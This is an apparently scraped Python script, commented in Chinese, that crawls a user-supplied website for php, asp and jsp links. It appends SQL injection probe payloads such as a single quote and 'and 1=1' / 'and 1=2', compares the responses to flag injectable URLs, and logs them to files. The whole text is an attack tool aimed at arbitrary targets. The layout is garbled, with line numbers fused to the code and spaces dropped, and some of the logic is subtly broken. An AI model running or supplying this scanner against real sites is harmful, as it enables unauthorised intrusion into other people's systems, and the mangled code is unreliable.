1 importrequests,re,time,os2 from tqdm importtqdm3 from bs4 importBeautifulSoup4 defzhuru():5 globalx,headers,ps6 user=input('[+]Please enter the URL you want to test:') #用户输入要检测的网站
7 url="{}".format(user.strip()) #去除两边的空格
8 headers={'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36'}9 request=requests.get(url,headers) #浏览器头
10 shoujiurl=[] #创建一个收集URL链接的列表
11 rse=request.content12 gwd=BeautifulSoup(rse,'html.parser')13 php=gwd.find_all(href=re.compile(r'php\?')) #寻找后缀名为php的链接
14 asp=gwd.find_all(href=re.compile(r'asp\?')) #寻找后缀名为asp的链接
15 jsp=gwd.find_all(href=re.compile(r'jsp\?')) #寻找后缀名为jsp的链接
16 print('[+]Collection URL')17 for i in tqdm(range(1,500)): #进度条
18 time.sleep(0.001) #进度条
19 for lk inphp:20 basd=lk.get('href') #提取其中的链接
21 shoujiurl.append(basd) #加入列表
22 for ba inasp:23 basd2=ba.get('href') #提取其中的链接
24 shoujiurl.append(basd2) #加入列表
25 for op injsp:26 basd3=op.get('href') #提取其中的链接
27 shoujiurl.append(basd3) #加入列表
28 print('[+]Collection completed')29
30
31 huixian=[]32 huixian1 = "is not a valid MySQL result resource"
33 huixian2 = "ODBC SQL Server Driver"
34 huixian3 = "Warning:ociexecute"
35 huixian4 = "Warning: pq_query[function.pg-query]"
36 huixian5 = "You have an error in your SQL syntax"
37 huixian6 = "Database Engine"
38 huixian7 = "Undefined variable"
39 huixian8 = "on line"
40 huixian9 = "mysql_fetch_array():"
41
42 huixian.append(huixian1)43 huixian.append(huixian2)44 huixian.append(huixian3)45 huixian.append(huixian4)46 huixian.append(huixian5)47 huixian.append(huixian6)48 huixian.append(huixian7)49 huixian.append(huixian8)50 huixian.append(huixian9)51 for g inhuixian:52 ps="".join(g) #过滤掉[]
53
54 payload0="'"
55 payload1="''"
56 payload2="%20and%201=1"
57 payload3="%20and%201=2"
58 for x inshoujiurl:59 yuan="".join(x) #过滤掉[]
60 ssdx="".join(x)+payload0 #添加payload
61 ssdx2="".join(x)+payload162 ssdx3="".join(x)+payload263 ssdx4="".join(x)+payload364 pdul=re.findall('[a-zA-z]+://[^\s]*',ssdx) #过滤掉一些残缺不全的链接
65 pdul2=re.findall('[a-zA-z]+://[^\s]*',ssdx2)66 pdul3=re.findall('[a-zA-z]+://[^\s]*',yuan)67 pdul4=re.findall('[a-zA-z]+://[^\s]*',ssdx3)68 pdul5=re.findall('[a-zA-z]+://[^\s]*',ssdx4)69 psuw="".join(pdul) #过滤掉[]
70 psuw2="".join(pdul2)71 psuw3="".join(pdul3)72 psuw4="".join(pdul4)73 psuw5="".join(pdul5)74 try:75 resg=requests.get(url=psuw,headers=headers,timeout=6)76 resg2=requests.get(url=psuw2,headers=headers,timeout=6)77 resg3=requests.get(url=psuw3,headers=headers,timeout=6)78 resg4=requests.get(url=psuw4,headers=headers,timeout=6)79 resg5=requests.get(url=psuw5,headers=headers,timeout=6)80 if resg.status_code == 200: #判断状态码是否等于200
81 print('[+]The first step is completed, and the goal is to be stable')82 time.sleep(1)83 if resg.content != resg2.content and resg3.content == resg2.content: #判断是不是字符型注入
84
85 print('[+]Existence of character injection')86 print(resg3.url)87 print(resg3.url,file=open('character.txt','a')) #如果是写入脚本
88 elif resg4.content != resg5.content and resg4.content == resg3.content: #判断是不是数字型注入
89 print('[+]Digital injection')90 print(resg3.url)91 print(resg3.url,file=open('injection.txt','a')) #如果是写入脚本
92 else: #两者都不是
93 print('[+]Sorry, not character injection')94 print('[+]Sorry, not Digital injection')95 print(resg3.url)96 if ps instr(resg2.content):97 print('[+]The wrong sentence to be found',ps)98 elif resg.status_code != 200:99 print('http_stode:',resg.status_code)100 print('[-]Sorry, I cant tell if there is an injection')101 except:102 pass
103
104
105 zhuru()